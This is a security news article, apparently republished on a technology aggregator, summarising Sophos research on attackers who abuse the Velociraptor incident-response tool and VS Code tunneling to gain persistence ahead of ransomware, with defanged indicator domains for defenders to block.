Thursday, September 4, 2025
HomeNewsAttackers Turn Velociraptor Into Backdoor for Ransomware Deployment by Husain Parvez
News

Attackers Turn Velociraptor Into Backdoor for Ransomware Deployment by Husain Parvez

Safety Detectives
By Safety Detectives
0
0


Husain Parvez

Published on: September 4, 2025
Writer

Sophos researchers have uncovered a new twist in attacker tradecraft: the abuse of Velociraptor, a legitimate open-source incident response tool, to gain remote access and set up persistence on compromised systems. The discovery highlights how tools designed for defense can be flipped into offensive assets.

According to Sophos’ Counter Threat Unit (CTU), “In this incident, the threat actor used the tool to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command and control (C2) server.” The technique triggered a Taegis alert when Visual Studio Code’s tunneling option was enabled, a feature that has been misused by multiple threat groups in the past.

Investigators say the attack began with the Windows msiexec utility fetching an installer from a Cloudflare Workers domain that appeared to host staging files, including Velociraptor, Cloudflare Tunnel, and the Radmin remote administration tool.

Once Velociraptor was installed and configured to talk to a C2 domain, the attacker used PowerShell to download Visual Studio Code from the same location and run it as a background service. Further malware payloads were then retrieved using msiexec. Sophos concluded the activity “would likely have led to ransomware deployment” if not detected in time.

This marks an escalation from the more familiar abuse of remote monitoring and management tools. As Sophos explained, “Organizations should monitor for and investigate unauthorized use of Velociraptor and treat observations of this tradecraft as a precursor to ransomware.” The warning underscores the growing need for companies to track not just traditional malware but also unexpected uses of legitimate security software.

Sophos has mapped the infrastructure used in the campaign to Cloudflare Workers domains files[.]qaubctgg[.]workers[.]dev and velo[.]qaubctgg[.]workers[.]dev. Security teams are urged to block these indicators and implement strong endpoint detection and response systems.

Previous article
The Samsung Galaxy S25 FE is fine — but changing these 7 settings will make it shine
Safety Detectives
Safety Detectiveshttps://www.safetydetectives.com/
RELATED ARTICLES

Most Popular

Load more
Algomaster
Algomaster
202 POSTS0 COMMENTS
https://blog.algomaster.io
Calisto Chipfumbu
Calisto Chipfumbu
6640 POSTS0 COMMENTS
http://cchipfumbu@gmail.com
Dominic
Dominic
32264 POSTS0 COMMENTS
http://wardslaus.com
Milvus
Milvus
81 POSTS0 COMMENTS
https://milvus.io/
Nango Kala
Nango Kala
6632 POSTS0 COMMENTS
neverop
neverop
0 POSTS0 COMMENTS
https://geeksforgeeks.org
Nicole Veronica
Nicole Veronica
11800 POSTS0 COMMENTS
Nokonwaba Nkukhwana
Nokonwaba Nkukhwana
11859 POSTS0 COMMENTS
Safety Detectives
Safety Detectives
2597 POSTS0 COMMENTS
https://www.safetydetectives.com/
Shaida Kate Naidoo
Shaida Kate Naidoo
6749 POSTS0 COMMENTS
Ted Musemwa
Ted Musemwa
7025 POSTS0 COMMENTS
Thapelo Manthata
Thapelo Manthata
6698 POSTS0 COMMENTS
Umr Jansen
Umr Jansen
6718 POSTS0 COMMENTS

EDITOR PICKS

POPULAR POSTS

POPULAR CATEGORY

ABOUT US

We provide you with the latest breaking news and videos straight from the technology industry.

Contact us: hello@geeksforgeeks.org

FOLLOW US

© NeverOpen 2022